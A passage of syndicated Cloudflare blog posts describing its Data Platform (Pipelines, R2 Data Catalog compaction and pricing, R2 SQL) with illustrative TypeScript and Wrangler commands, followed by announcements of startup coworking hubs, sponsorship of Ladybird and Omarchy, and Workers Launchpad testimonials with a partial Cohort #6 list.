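console.log(planScan(tableMetadata, 150, 160)); // [ 'data/b.parquet' ]
```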

The adoption of Iceberg across the industry meant users were no longer locked in to one query engine. But egress fees still made it cost-prohibitive to query data across regions and clouds. R2, with zero-cost egress, solves that problem: users would no longer be locked in to their clouds either. They could store their data in a vendor-neutral location and let teams use whatever query engine made sense for their data and query patterns.

But users still had to manage all of the metadata and other infrastructure themselves. We realized there was an opportunity for us to solve a major pain point and reduce the friction of storing data lakes on R2. This became R2 Data Catalog, our managed Iceberg catalog.

With the data stored on R2 and metadata managed, that still left a few gaps for users to solve.

How do you get data into your Iceberg tables? Once it’s there, how do you optimize for query performance? And how do you actually get value from your data without needing to self-host a query engine or use another cloud platform?

In the rest of this post, we’ll walk through how the three products that make up the Data Platform solve these challenges.

Cloudflare Pipelines

Analytical data tables are made up of events, things that happened at a particular point in time. They might come from server logs, mobile applications, or IoT devices, and are encoded in data formats like JSON, Avro, or Protobuf. They ideally have a schema — a standardized set of fields — but might just be whatever a particular team thought to throw in there.

But before you can query your events with Iceberg, they need to be ingested, structured according to a schema, and written into object storage. This is the role of Cloudflare Pipelines.

Built on top of Arroyo, a stream processing engine we acquired earlier this year, Pipelines receives events, transforms them with SQL queries, and sinks them to R2 and R2 Data Catalog.

Pipelines is organized around three central objects:

Streams are how you get data into Cloudflare. They’re durable, buffered queues that receive events and store them for processing. Streams can accept events in two ways: via an HTTP endpoint or from a Cloudflare Worker binding.

Sinks define the destination for your data. We support ingesting into R2 Data Catalog, as well as writing raw files to R2 as JSON or Apache Parquet. Sinks can be configured to frequently write files, prioritizing low-latency ingestion, or to write less frequent, larger files to get better query performance. In either case, ingestion is exactly-once, which means that we will never duplicate or drop events on their way to R2.

Pipelines connect streams and sinks via SQL transformations, which can modify events before writing them to storage. This enables you to shift left, pushing validation, schematization, and processing to your ingestion layer to make your queries easy, fast, and correct.
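
As a rough sketch of the HTTP ingestion path, the TypeScript below batches events and POSTs each batch to a stream endpoint as a JSON array. The endpoint URL, the JSON-array request body, the batch size, and the absence of authentication are all assumptions for illustration; check the Pipelines developer docs for the actual endpoint format. The fetch function is injected so the sketch can be exercised without a network.

```typescript
// Hypothetical event shape matching the clickstream example in this post.
interface ClickEvent {
  user_id: string;
  event: string;
  ts_us: number; // microseconds since the Unix epoch
  url: string;
  referrer: string;
  user_agent: string;
}

// Minimal subset of fetch that this sketch needs; the global fetch satisfies it.
type FetchLike = (
  url: string,
  init: { method: string; headers: Record<string, string>; body: string },
) => Promise<{ ok: boolean; status: number }>;

// Send events in fixed-size batches. Returns the number of requests made and
// throws on the first non-2xx response, so the caller can retry from there.
async function sendEvents(
  endpoint: string, // placeholder: the HTTP endpoint of your stream
  events: ClickEvent[],
  fetchFn: FetchLike,
  batchSize = 100, // assumed batch size, not a documented limit
): Promise<number> {
  let requests = 0;
  for (let i = 0; i < events.length; i += batchSize) {
    const batch = events.slice(i, i + batchSize);
    const res = await fetchFn(endpoint, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(batch),
    });
    requests++;
    if (!res.ok) throw new Error(`batch at offset ${i} rejected: HTTP ${res.status}`);
  }
  return requests;
}
```

In Node 18+ or a Worker you could pass the global fetch as fetchFn. From inside a Worker, though, the stream's binding is the more natural route; take its exact method names from the docs rather than from this sketch.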


For example, here’s a pipeline that ingests events from a clickstream data source and writes them to Iceberg:

INSERT INTO events_table
SELECT
  user_id,
  lower(event) AS event_type,
  to_timestamp_micros(ts_us) AS event_time,
  regexp_match(url, '^https?://([^/]+)')[1] AS domain,
  url,
  referrer,
  user_agent
FROM events_json
WHERE event = 'page_view'
  AND NOT regexp_like(user_agent, '(?i)bot|spider');
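
For readers more at home in TypeScript than SQL, here is a minimal sketch of what the pipeline above does to each event, written as an ordinary array transformation. It only illustrates the semantics; it is not how Pipelines executes SQL, and the RawEvent shape is an assumption inferred from the column names in the query.

```typescript
// Raw event as it arrives in events_json (shape assumed from the query).
interface RawEvent {
  user_id: string;
  event: string;
  ts_us: number; // microseconds since the Unix epoch
  url: string;
  referrer: string;
  user_agent: string;
}

// Row written to events_table.
interface EventRow {
  user_id: string;
  event_type: string;
  event_time: Date;
  domain: string | null;
  url: string;
  referrer: string;
  user_agent: string;
}

const DOMAIN_RE = /^https?:\/\/([^/]+)/;
const BOT_RE = /bot|spider/i; // same pattern as '(?i)bot|spider'

function transform(events: RawEvent[]): EventRow[] {
  return events
    // WHERE event = 'page_view' AND NOT regexp_like(user_agent, '(?i)bot|spider')
    .filter((e) => e.event === "page_view" && !BOT_RE.test(e.user_agent))
    .map((e) => ({
      user_id: e.user_id,
      event_type: e.event.toLowerCase(),
      // to_timestamp_micros: a JS Date only keeps milliseconds, so micros are truncated
      event_time: new Date(Math.floor(e.ts_us / 1000)),
      // regexp_match(...)[1]: the first capture group, or null if the URL doesn't match
      domain: DOMAIN_RE.exec(e.url)?.[1] ?? null,
      url: e.url,
      referrer: e.referrer,
      user_agent: e.user_agent,
    }));
}

// Usage: the crawler and the non-page_view event are both dropped.
const sample: RawEvent[] = [
  { user_id: "u1", event: "page_view", ts_us: 1_700_000_000_000_000, url: "https://example.com/a", referrer: "", user_agent: "Mozilla/5.0" },
  { user_id: "u2", event: "page_view", ts_us: 0, url: "https://example.com/b", referrer: "", user_agent: "Googlebot/2.1" },
  { user_id: "u3", event: "click", ts_us: 0, url: "https://example.com/c", referrer: "", user_agent: "Mozilla/5.0" },
];
console.log(transform(sample));
```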

SQL transformations are very powerful and give you full control over how data is structured and written into the table. For example, you can

  • Schematize and normalize your data, even using JSON functions to extract fields from arbitrary JSON

  • Filter out events or split them into separate tables with their own schemas

  • Redact sensitive information before storage with regexes

  • Unroll nested arrays and objects into separate events
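
Two of these transformations, regex redaction and unrolling nested arrays, are easy to picture as ordinary code. The sketch below is plain TypeScript rather than Pipelines SQL; the CartEvent shape and the email regex are hypothetical examples chosen for illustration, and in a pipeline the same logic would be expressed in the SQL transformation itself.

```typescript
// Hypothetical raw event carrying free text and a nested array.
interface CartEvent {
  user_id: string;
  note: string;
  items: { sku: string; qty: number }[];
}

// Hypothetical flattened row: one per cart item.
interface CartItemRow {
  user_id: string;
  note: string;
  sku: string;
  qty: number;
}

// A simple (not RFC-complete) email pattern; global so every match is replaced.
const EMAIL_RE = /[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}/g;

function redact(text: string): string {
  return text.replace(EMAIL_RE, "[REDACTED]");
}

// Unroll: one input event with N items becomes N output rows.
// An event with an empty items array produces no rows.
function unroll(events: CartEvent[]): CartItemRow[] {
  return events.flatMap((e) =>
    e.items.map((item) => ({
      user_id: e.user_id,
      note: redact(e.note),
      sku: item.sku,
      qty: item.qty,
    })),
  );
}

const flattened = unroll([
  { user_id: "u1", note: "contact jane.doe@example.com", items: [{ sku: "A", qty: 1 }, { sku: "B", qty: 2 }] },
]);
console.log(flattened); // two rows, both with note "contact [REDACTED]"
```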

Initially, Pipelines supports stateless transformations. In the future, we’ll leverage more of Arroyo’s stateful processing capabilities to support aggregations, incrementally-updated materialized views, and joins.

Cloudflare Pipelines is available today in open beta. You can create a pipeline using the dashboard, Wrangler, or the REST API. To get started, check out our developer docs.

We aren’t currently billing for Pipelines during the open beta. However, R2 storage and operations incurred by sinks writing data to R2 are billed at standard rates. When we start billing, we anticipate charging based on the amount of data read, the amount of data processed via SQL transformations, and data delivered.

R2 Data Catalog

We launched the open beta of R2 Data Catalog in April and have been amazed by the response. Query engines like DuckDB have added native support, and we’ve seen useful integrations like marimo notebooks.

R2 Data Catalog makes getting started with Iceberg easy. There’s no need to set up a database cluster, connect to object storage, or manage any infrastructure. You can create a catalog with a couple of Wrangler commands:

$ npx wrangler r2 bucket create mycatalog
$ npx wrangler r2 bucket catalog enable mycatalog

This provisions a data lake that can scale to petabytes of storage, queryable by whatever engine you want to use with zero egress fees.

But just storing the data isn’t enough. Over time, as data is ingested, the number of underlying data files that make up a table will grow, leading to slower and slower query performance.

This is a particular problem with low-latency ingestion, where the goal is to have events queryable as quickly as possible. Writing data frequently means the files are smaller, and there are more of them. Each file needed for a query has to be listed, downloaded, and read. The overhead of too many small files can dominate the total query time.
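
A back-of-the-envelope model shows why file count matters. Assume each file costs a fixed overhead (listing, request latency, reading file metadata) plus transfer time proportional to its size. The 20 ms per-file overhead and 200 MB/s throughput below are illustrative assumptions, not measurements of R2 or any query engine. Parallel reads shrink both terms, but under this model the ratio between the two layouts stays roughly the same.

```typescript
// Estimated time to scan a table: fixed cost per file + size-proportional transfer.
// Defaults are illustrative assumptions only.
function estimateScanSeconds(
  totalMB: number,
  fileCount: number,
  perFileOverheadMs = 20, // listing + request latency + metadata parsing, per file
  throughputMBps = 200,   // sequential read throughput
): number {
  const overheadS = (fileCount * perFileOverheadMs) / 1000;
  const transferS = totalMB / throughputMBps;
  return overheadS + transferS;
}

// The same 1,000 MB of data, stored two ways:
console.log(estimateScanSeconds(1000, 10_000)); // 205: 10,000 files of 0.1 MB
console.log(estimateScanSeconds(1000, 8));      // about 5.2: 8 files of 125 MB
```

With many small files, 200 of the 205 seconds in this model are per-file overhead rather than reading data.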

The solution is compaction, a periodic maintenance operation performed automatically by the catalog. Compaction rewrites small files into larger files, which reduces metadata overhead and improves query performance.
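
Planning small-file compaction is essentially a bin-packing problem. The sketch below shows one plausible approach using first-fit decreasing: small files are grouped into batches that each fit under a target size, and each batch would then be rewritten as a single larger file. The thresholds and names are assumptions, and this is not a description of how R2 Data Catalog chooses which files to compact.

```typescript
interface FileInfo {
  path: string;
  sizeBytes: number;
}

// Group files smaller than `smallThreshold` into batches whose combined size stays
// at or under `targetSize`. Files at or above the threshold are left alone.
// Illustrative first-fit-decreasing packing, not any catalog's actual algorithm.
function planCompaction(
  files: FileInfo[],
  targetSize: number,
  smallThreshold = targetSize / 4,
): FileInfo[][] {
  const small = files
    .filter((f) => f.sizeBytes < smallThreshold)
    .sort((a, b) => b.sizeBytes - a.sizeBytes); // largest first tends to pack tighter
  const batches: { files: FileInfo[]; total: number }[] = [];
  for (const f of small) {
    // Put the file into the first batch that still has room for it.
    const batch = batches.find((b) => b.total + f.sizeBytes <= targetSize);
    if (batch) {
      batch.files.push(f);
      batch.total += f.sizeBytes;
    } else {
      batches.push({ files: [f], total: f.sizeBytes });
    }
  }
  // Rewriting a lone file gains nothing, so only multi-file batches are returned.
  return batches.filter((b) => b.files.length > 1).map((b) => b.files);
}
```

For example, with a 128 MiB target, ten 20 MiB files pack into one batch of six and one batch of four, while a 100 MiB file stays untouched because it is already above the small-file threshold.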

Today we are launching compaction support in R2 Data Catalog. Enabling it for your catalog is as easy as:

$ npx wrangler r2 bucket catalog compaction enable mycatalog

We’re starting with support for small-file compaction, and will expand to additional compaction strategies in the future. Check out the compaction documentation to learn more about how it works and how to enable it.

At this time, during open beta, we aren’t billing for R2 Data Catalog. Below is our current thinking on future pricing:

Pricing*

  • R2 storage (standard storage class): $0.015 per GB-month (no change)

  • R2 Class A operations: $4.50 per million operations (no change)

  • R2 Class B operations: $0.36 per million operations (no change)

  • Data Catalog operations (e.g., create table, get table metadata, update table properties): $9.00 per million catalog operations

  • Data Catalog compaction data processed: $0.005 per GB processed and $2.00 per million objects processed

  • Data egress: $0 (no change, always free)

*Prices subject to change prior to General Availability.

We will provide at least 30 days’ notice before billing starts or if anything changes.
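
To see how these proposed prices combine, here is a small estimator. The prices are the pre-GA figures listed above and may change; the workload in the usage example is made up; and the function ignores any free-tier allowances. Egress is $0, so it does not appear in the formula.

```typescript
// Proposed prices from the list above (USD); subject to change before GA.
const PRICES = {
  storagePerGBMonth: 0.015,
  classAPerMillion: 4.5,
  classBPerMillion: 0.36,
  catalogOpsPerMillion: 9.0,
  compactionPerGB: 0.005,
  compactionPerMillionObjects: 2.0,
} as const;

interface MonthlyUsage {
  storageGB: number;
  classAOps: number;
  classBOps: number;
  catalogOps: number;
  compactedGB: number;
  compactedObjects: number;
}

// Sum of each usage dimension times its unit price. Free tiers are not modeled.
function estimateMonthlyCost(u: MonthlyUsage): number {
  const perMillion = (count: number, price: number) => (count / 1_000_000) * price;
  return (
    u.storageGB * PRICES.storagePerGBMonth +
    perMillion(u.classAOps, PRICES.classAPerMillion) +
    perMillion(u.classBOps, PRICES.classBPerMillion) +
    perMillion(u.catalogOps, PRICES.catalogOpsPerMillion) +
    u.compactedGB * PRICES.compactionPerGB +
    perMillion(u.compactedObjects, PRICES.compactionPerMillionObjects)
  );
}

// Hypothetical month: 1 TB stored, 2M Class A ops, 10M Class B ops,
// 1M catalog ops, 500 GB and 1M objects processed by compaction.
const exampleUsage: MonthlyUsage = {
  storageGB: 1000,
  classAOps: 2_000_000,
  classBOps: 10_000_000,
  catalogOps: 1_000_000,
  compactedGB: 500,
  compactedObjects: 1_000_000,
};
console.log(estimateMonthlyCost(exampleUsage).toFixed(2)); // 41.10
```

In this made-up workload, storage ($15) and operations ($21.60) dominate, while compaction adds $4.50.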

R2 SQL

Having data in R2 Data Catalog is only the first step; the real goal is getting insights and value from it. Traditionally, that means setting up and managing DuckDB, Spark, Trino, or another query engine, adding a layer of operational overhead between you and those insights. What if instead you could run queries directly on Cloudflare?

Now you can. We’ve built a query engine specifically designed for R2 Data Catalog and Cloudflare’s edge infrastructure. We call it R2 SQL, and it’s available today as an open beta.

With Wrangler, running a query on an R2 Data Catalog table is as easy as:

$ npx wrangler r2 sql query "{WAREHOUSE}" "\
  SELECT user_id, url FROM events \
  WHERE domain = 'mywebsite.com'"

Cloudflare’s ability to schedule compute anywhere on its global network is the foundation of R2 SQL’s design. This lets us process data directly where it lives, instead of requiring you to manage centralized clusters for your analytical workloads.

R2 SQL is tightly integrated with R2 Data Catalog and R2, which allows the query planner to go beyond simple storage scanning and make deep use of the rich statistics stored in the R2 Data Catalog metadata. This provides a powerful foundation for a new class of query optimizations, such as auxiliary indexes or enabling more complex analytical functions in the future.
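
One concrete example of using catalog statistics is file pruning. Iceberg metadata can record per-column lower and upper bounds for each data file, so a planner can skip any file whose range cannot contain a matching row. The sketch below shows the idea for an equality filter such as domain = 'mywebsite.com'; the types are simplified and hypothetical, plain string comparison stands in for the format's real ordering rules, and this is not R2 SQL's planner.

```typescript
// Simplified per-file statistics, in the spirit of Iceberg's lower/upper bounds.
interface ColumnBounds {
  lower: string;
  upper: string;
}

interface FileStats {
  path: string;
  bounds: Record<string, ColumnBounds | undefined>; // column -> bounds, if recorded
}

// Keep only files that might contain rows where `column = value`.
// A file with no bounds for the column must be kept: nothing can be ruled out.
function pruneForEquality(files: FileStats[], column: string, value: string): string[] {
  return files
    .filter((f) => {
      const b = f.bounds[column];
      if (!b) return true;
      return b.lower <= value && value <= b.upper;
    })
    .map((f) => f.path);
}
```

Only the surviving files need to be fetched at all, which is why rich statistics in the catalog translate directly into less data read per query.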

The result is a fully serverless experience for users. You can focus on your SQL without needing a deep understanding of how the engine operates. If you are curious about the internals, the team has written a deep dive into how R2 SQL’s distributed query engine works at scale.

The open beta is an early preview of R2 SQL’s querying capabilities and initially focuses on filter queries. Over time, we will expand its capabilities to cover more SQL features, like complex aggregations.

We’re excited to see what our users do with R2 SQL. To try it out, see the documentation and tutorials. During the beta, R2 SQL usage is not currently billed, but R2 storage and operations incurred by queries are billed at standard rates. We plan to charge for the volume of data scanned by queries in the future and will provide notice before billing begins.

Wrapping up

Today, you can use the Cloudflare Data Platform to ingest events into R2 Data Catalog and query them via R2 SQL. In the first half of 2026, we’ll be expanding on the capabilities in all of these products, including:

  • Integration with Logpush, so you can transform, store, and query your logs directly within Cloudflare

  • User-defined functions via Workers, and stateful processing support for streaming transformations

  • Expanding the feature set of R2 SQL to cover aggregations and joins

In the meantime, you can get started with the Cloudflare Data Platform by following the tutorial to create an end-to-end analytical data system, from ingestion with Pipelines, through storage in R2 Data Catalog, and querying with R2 SQL. 

We’re excited to see what you build! Come share your feedback with us on our Developer Discord.

Come build with us: Cloudflare’s new hubs for startups

Post Syndicated from Christopher Rotas original https://blog.cloudflare.com/new-hubs-for-startups/

Cloudflare’s offices bring together builders in some of the world’s most popular technology hubs. Over the last fifteen years, we have often used those spaces for one-off events and meetups, but we want to do more. Starting in 2026, we plan to routinely open the doors of our offices to startups and builders from outside our team who need the space to collaborate, meet new people, or just type away at a keyboard in a new (and beautiful) location.

What are our offices meant to be?

Prior to 2020, we expected essentially every team member of Cloudflare to be present in one of our offices five days a week. That worked well for us and helped facilitate the launch of dozens of technologies as well as a community and culture that defined who we are.

Like every other team on the planet, we had to revisit that approach when the COVID pandemic hit. We used the time to think about what our offices could be in a world where not every team member showed up every day of the week. While we decided to be open to remote and hybrid work, we still felt that some of our best work was done in person, together. The goal became building spaces that encouraged team members to be present.

Several hard hats and a few leases later, we’ve created a network of offices around the world designed to evolve with the way people work. These spaces aren’t just places to sit; they’re environments that empower people to do their best work, whether that means quiet focus, creative problem-solving, or lively collaboration. From a library tucked into a quiet zone in our waterfront Lisbon office to the high-ceilinged collaboration areas in the heart of Austin, each office reflects our belief that great spaces support diverse working styles and help teams thrive together.

Our offices are meant to connect our teams, and we believe that by opening our doors to the wider community, we can foster even more innovation and help new companies collaborate better. Cloudflare has always been a hub for builders, and now we’re making that commitment official by welcoming startups into our physical spaces.

Why make them even more open to the community?

Our spaces have hosted community events since the earliest days of Cloudflare. We have brought together just about every kind of group, from hackathons to language meetups to university orientation sessions. Cloudflare exists to help build a better Internet, and in many cases a better digital environment starts with relationships built in real life.

One of the most common pieces of feedback we have received after hosting these events in the last few years is “I really miss connecting with people like this.” We hear it most often from small teams in the earliest stages of their journey. That is no surprise: in the last few years, the startups we support with our platform have increasingly started out remote-first and opened dedicated spaces only in later stages of their growth.

We know that building a company can be a lonely path. We have helped over the last several years by providing a robust free plan and a comprehensive start-up program, but we think we can do more.

Cloudflare’s network supports a significant percentage of the Internet and, as you would expect, the Internet follows the sun. More people use it during the daytime than at night, meaning our data center utilization peaks at specific times of the day. We take advantage of that pattern to run less latency-sensitive services in those regions overnight.

Our physical locations follow a similar pattern. Utilization resembles a bell curve, with Tuesdays, Wednesdays, and Thursdays seeing a lot of traffic while Mondays and Fridays tend to be quieter. Just as we put spare CPU capacity to work at night, we think we can use this excess capacity to help build a better Internet by giving builders a space to congregate and helping our team connect with more of our users.

How will this work?

Beginning in January 2026, we plan to make our office locations available to a capped number of external visitors as all-day coworking spaces on select days of each week. We will provide a registration process (more on that below) and set some ground rules. To start, we plan to offer this in San Francisco, Austin, London, and Lisbon.

When external visitors arrive, they’ll have access to our common spaces to bring together their teams or just get some work done by themselves. No mandatory talks or obligations. Just fantastic working spaces available to use at no cost.

How can you participate?

We will provide more details in the next few weeks, but the general structure will be based on the following steps.

  1. Enroll in the Cloudflare for Startups Program. Bonus if you are a current or former Workers Launchpad participant.

  2. Sit tight for now. We will first email participating Startup Program customers a form to request office access.

  3. Once you fill out the form, a member of our team will follow up. If you want to get a head start, fill out the form here.

  4. We plan to roll this out on a cohort basis. Once approved and all requirements are met, register your visit (and that of any additional team members) at least three business days prior to the date requested.

  5. Respect our working spaces as you would your own.

What’s next?

We hope to expand to other locations in the future. Want to get to the front of the line? Sign up for our Startup program here today and we will reach out to Startup Program participants before we roll out the program.

Supporting the future of the open web: Cloudflare is sponsoring Ladybird and Omarchy

Post Syndicated from Mari Galicer original https://blog.cloudflare.com/supporting-the-future-of-the-open-web/

At Cloudflare, we believe that helping build a better Internet means encouraging a healthy ecosystem of options for how people can connect safely and quickly to the resources they need. Sometimes that means we tackle immense, Internet-scale problems with established partners. And sometimes that means we support and partner with fantastic open teams taking big bets on the next generation of tools.

To that end, today we are excited to announce our support of two independent, open source projects: Ladybird, an ambitious project to build a completely independent browser from the ground up, and Omarchy, an opinionated Arch Linux setup for developers. 

Two open source projects strengthening the open Internet 

Cloudflare has a long history of supporting open-source software – both through our own projects shared with the community and external projects that we support. We see our sponsorship of Ladybird and Omarchy as a natural extension of these efforts in a moment where energy for a diverse ecosystem is needed more than ever.  

Ladybird, a new and independent browser 

Most of us spend a significant amount of time using a web browser –  in fact, you’re probably using one to read this blog! The beauty of browsers is that they help users experience the open Internet, giving you access to everything from the largest news publications in the world to a tiny website hosted on a Raspberry Pi.  

Unlike dedicated apps, browsers reduce the barriers to building an audience for new services and communities on the Internet. If you are launching something new, you can offer it through a browser in a world where most people have absolutely zero desire to install an app just to try something out. Browsers help encourage competition and new ideas on the open web.

While the openness of how browsers work has led to an explosive growth of services on the Internet, browsers themselves have consolidated to a tiny handful of viable options. There’s a high probability you’re reading this on a Chromium-based browser like Google’s Chrome, as are about 65% of Internet users. That consolidation has also scared off new entrants in the space. If all browsers ship on the same operating systems, powered by the same underlying technology, we lose out on potential privacy, security, and performance innovations that could benefit developers and everyday Internet users.


A screenshot of Cloudflare Workers developer docs in Ladybird 

This is where Ladybird comes in: it’s not Chromium based – everything is built from scratch. The Ladybird project has two main components: LibWeb, a brand-new rendering engine, and LibJS, a brand-new JavaScript engine with its own parser, interpreter, and bytecode execution engine. 

Building an engine that can correctly and securely render the modern web is a monumental task that requires deep technical expertise and navigating decades of specifications governed by standards bodies like the W3C and WHATWG. And because Ladybird implements these standards directly, it also stress-tests them in practice. Along the way, the project has found, reported, and sometimes fixed countless issues in the specifications themselves, contributions that strengthen the entire web platform for developers, browser vendors, and anyone who may attempt to build a browser in the future.

Whether to build something from scratch is a perennial source of debate among software engineers. But because Ladybird is free from the pressures of revenue and special interests, we’re excited about the ways it can prioritize privacy, performance, and security, potentially in novel ways that will influence the entire ecosystem.


A screenshot of the Omarchy development environment

Omarchy, an independent development environment 

Developers deserve choice, too. Beyond the browser, a developer’s operating system and environment is where they spend a ton of time – and where a few big players have become the dominant choice. Omarchy challenges this by providing a complete, opinionated Arch Linux distribution that transforms a bare installation into a modern development workstation that developers are excited about.

Perfecting one’s development environment can be a career-long art, but learning how to do so shouldn’t be a barrier to beginning to code. The beauty of Omarchy is that it makes Linux approachable to more developers by doing most of the setup for them, making it look good, and then making it configurable. Out of the box, Omarchy provides most of the tools developers need, like Neovim, Docker, and Git, along with many other features.

At its core, Omarchy embraces Linux for all of its complexity and configurability, and makes a version of it that is accessible and fun to use for developers who don’t have a deep background in operating systems. Projects like this ensure that a powerful, independent Linux desktop remains a compelling choice for people building the next generation of applications and Internet infrastructure.

Our support comes with no strings attached  

We want to be very clear here: we are supporting these projects because we believe the Internet can be better if these projects, and more like them, succeed. There is no requirement to use our technology stack or any arrangement like that. We are happy to partner with great teams like Ladybird and Omarchy simply because we believe that our missions have real overlap.

Notes from the teams

Ladybird is still in its early days, with an alpha release planned for 2026, but we encourage anyone who is interested to consider contributing to the open source codebase as they prepare for launch.

“Cloudflare knows what it means to build critical web infrastructure on the server side. With Ladybird, we’re tackling the near-monoculture on the client side, because we believe it needs multiple implementations to stay healthy, and we’re extremely thankful for their support in that mission.”

Andreas Kling, Founder, Ladybird  

Omarchy 3.0 was released just last week with faster installation and increased MacBook compatibility, so if you’ve been Linux-curious for a while now, we encourage you to try it out!

“Cloudflare’s support of Omarchy has ensured we have the fastest ISO and package delivery from wherever you are in the world. Without a need to manually configure mirrors or deal with torrents. The combo of a super CDN, great R2 storage, and the best DDoS shield in the business has been a huge help for the project.”

David Heinemeier Hansson, Creator of Omarchy and Ruby on Rails

A better Internet is one where people have more choice in how they browse and develop new software. We’re incredibly excited about the potential of Ladybird, Omarchy, and other audacious projects that support a free and open Internet.

A Lookback at Workers Launchpad and a Warm Welcome to Cohort #6

Post Syndicated from Christopher Rotas original https://blog.cloudflare.com/workers-launchpad-006/

Imagine you have an idea for an AI application that you’re really excited about — but the cost of GPU time and complex infrastructure stops you in your tracks before you even write a line of code. This is the problem founders everywhere face: balancing high infrastructure costs with the need to innovate and scale quickly.

Our startup programs remove those barriers, so founders can focus on what matters most: building products, finding customers, and growing a business. Cloudflare for Startups launched in 2018 to provide enterprise-level application security and performance services to growing startups. As we built out our Developer Platform, we pivoted the program last year to offer founders up to $250,000 in cloud credits to build on it for up to one year.

During Birthday Week 2022, we announced our Cloudflare Workers Launchpad Program with an initial $1.25 billion in potential funding for startups building on Cloudflare Workers, made possible through partnerships with 26 leading venture capital (VC) firms. Within months, we expanded VC-backed funding to $2 billion.

Since 2022, we’ve welcomed 145 startups from 23 countries. These startups are solving problems across verticals such as AI and machine learning, developer tools, 3D design, cloud infrastructure, data tools, ad tech, media, logistics, finance, and other industries. We’re especially proud of the female founder representation in recent cohorts — with nearly a third of companies in Cohort #5 run by a female founder. 

Participants engaged in bootcamp sessions with Cloudflare leadership and product teams, covering key topics like product pricing and scaling sales. Startups received hands-on design support from our Solutions Architecture team to help them build and scale their full-stack applications on the Cloudflare network. We facilitate countless introductions across the VC network and are happy to see funding and M&A activity as these startups scale. Cloudflare also identified direct opportunities and acquired Nefeli Networks (Cohort #2) and Outerbase (Cohort #4).

Check out what Launchpad alumni have to say about their experience in the program:

Langbase (Cohort #3)
Ship hyper-personalized AI apps to any LLM, any data, any developer in seconds


“For Langbase, the best part about Workers Launchpad was the incredible support from Cloudflare’s internal teams. It wasn’t just about access to infrastructure; it was the hands-on migration help, rapid feedback loops, and genuine partnership from engineers, product folks, and the broader Cloudflare community. That human support empowered us to iterate faster, solve hard problems, and truly feel like we were building something impactful together. 

Langbase has quickly become one of the most powerful serverless AI clouds for building and deploying AI agents. We process 700 TB of agent memory and 1.2 billion AI agent runs a month. Langbase is an agent lab, and we’ve also launched a coding agent called Command.new, an “agent of agents” that can take your prompts and turn them into production-ready agents by provisioning infrastructure and writing the agent’s code in TypeScript.

My advice for anyone joining future Workers Launchpad cohorts is to use every resource offered. Engage deeply with the Cloudflare teams, ask for feedback early and often, and be open to sharing your challenges and wins, especially in the Discord community, which is super helpful. Cloudflare listens closely to participant feedback and genuinely wants to help startups succeed. Treat it as a two-way conversation and a collaborative growth opportunity. This mindset is what unlocks the real power of the program.”

-Ahmad Awais, Founder & CEO of Langbase

Sherpo.io (Cohort #4)
AI-first no-code platform to build and sell digital content


“Since joining Cohort #4, we’ve exited closed beta and expanded our product suite for content creators. Today, more than 3,000 creators worldwide power their digital product stores with Sherpo, while we continue building and scaling.

We learned as much from fellow startups as from Cloudflare during office hours and sessions, and we got to meet incredible people along the way, including Cloudflare’s CSO, Stephanie Cohen.

For anyone joining, attend every session, listen closely, and ask questions—they’re incredibly valuable. Building on Workers has given us a real advantage, and the team’s pace of innovation only compounds it.”

-Giacomo Di Pinto, Co-Founder & CEO of Sherpo.io

Tightknit AI (Cohort #4)
Embedded community engagement platform built for SaaS


“Beyond the cloud credits that Launchpad provided us to play with every Cloudflare product, the most important aspect of the program we found was our ability to access (and even contribute) to the product roadmap. We were able to connect with product managers and solutions architects that have helped us take our work to the next level.

We’ve recently passed half a million users on the platform and have started to close not just the top SaaS businesses in the world, but the top AI companies in the world, including Clay, Gamma, Lindy, beehiiv, Amplitude, Mixpanel, and so many more. The best part is that 100% of application logic is still powered by Cloudflare!

The biggest piece of advice for anyone starting the cohort is attend office hours as much as you can. I can’t tell you how many times we were able to unblock ourselves or even provide real product feedback/bug reports. It was amazing to meet the rest of the cohort and solve problems together that ordinary Cloudflare developers just do not face. So my advice is don’t miss the office hours. They were by far the most valuable part of our experience.”

-Zach Hawtof, Co-Founder & CEO of Tightknit.ai

Render Better (Cohort #4)
Increase e-commerce revenue by automatically optimizing your site speed


“My favorite part of the Launchpad was the community and the leaders who brought us together. The startup and product teams provided expert advice on both business and technical questions through meetings, 1-on-1s, and Discord. Many of them were former founders, so they understood what we were going through and helped us get what we needed. They were crucial in helping us get unstuck, whether we were using obscure Cloudflare features or needed connections to the right people.

I met a lot of great founders who are on the same journey and face the same struggles. Watching them grow was motivating and gave us a morale boost to keep up the fast pace a startup needs.

Since Launchpad, Render Better has scaled to 60 automated site speed optimizations, helping e-commerce sites convert 20% higher powered by Cloudflare Workers. Our growth accelerated after the program, and we’re now optimizing traffic for some of the biggest e-commerce brands like PSD, Polywood, and Self-Portrait. Render Better now processes 5 billion requests each month, made possible by Cloudflare’s global edge network and Workers platform.

Launchpad is truly just that: Cloudflare gives you the resources and attention to help you grow from an idea into something big. Build fast and take as much advantage of the fuel they give you to fly your startup rocket!”

-James Koshigoe, Founder & CEO of Render Better

Launchpad is growing into more than just a program. It is a community of builders and innovators showing what is possible with Cloudflare’s network behind them. With that foundation, we are excited to introduce the next group of entrepreneurs taking the stage in Cohort #6.

Introducing Cohort #6

Before introducing Cohort #6, we want to give one last shout-out to Cohort #5. Now that you are Launchpad alumni, we cannot wait to see what you achieve. If you didn’t get a chance to check out Cohort #5’s demo day, watch the recording here.

With that, help us give a warm welcome to the participants of Workers Launchpad Cohort #6:


  • Allegory: AI-powered platform connecting impact to funding

  • Apgio: Mobile app localization platform with smart AI translations and workflow tooling

  • Atlas: Building the operating system for restaurants

  • Bloctave: Configurable rights management platform with instantaneous royalty distribution

  • Byte: AI code auditor that translates codebases into natural language

  • Calljmp: Agentic AI backend for apps

  • Centian: MCP-powered AI agent middleware for successful and compliant operations

  • Divinci AI: Release management and quality assurance for custom LLMs

  • DXOS: An extensible open-core super-app designed to be your team’s brain

  • Fidsy: AI-native, code-free orchestration platform providing automated data privacy for all AI and data workflows

  • Fluentos: Create popups your customers won’t hate

  • Framebird: Media sharing solution for creatives featuring modern galleries and client review tools

  • GoPersonal: AI to build, personalize, and manage your ecommerce business

  • Horizon: Short-form and agentic experiences for apps and websites

  • Kenobi: Personalizing the Internet with custom web experiences

  • MonetizationOS: Intelligent decisioning at the edge, for monetising the human and machine web

  • Natively.dev: Build your dream mobile app using AI, enabling users to take it directly to the App Stores

  • Outhire: AI agent automating phone screens without bias

  • Outsession: Privacy-first AI tools that preserve the therapeutic relationship

  • Phleid: Direct-to-wallet mobile passes and notifications platform

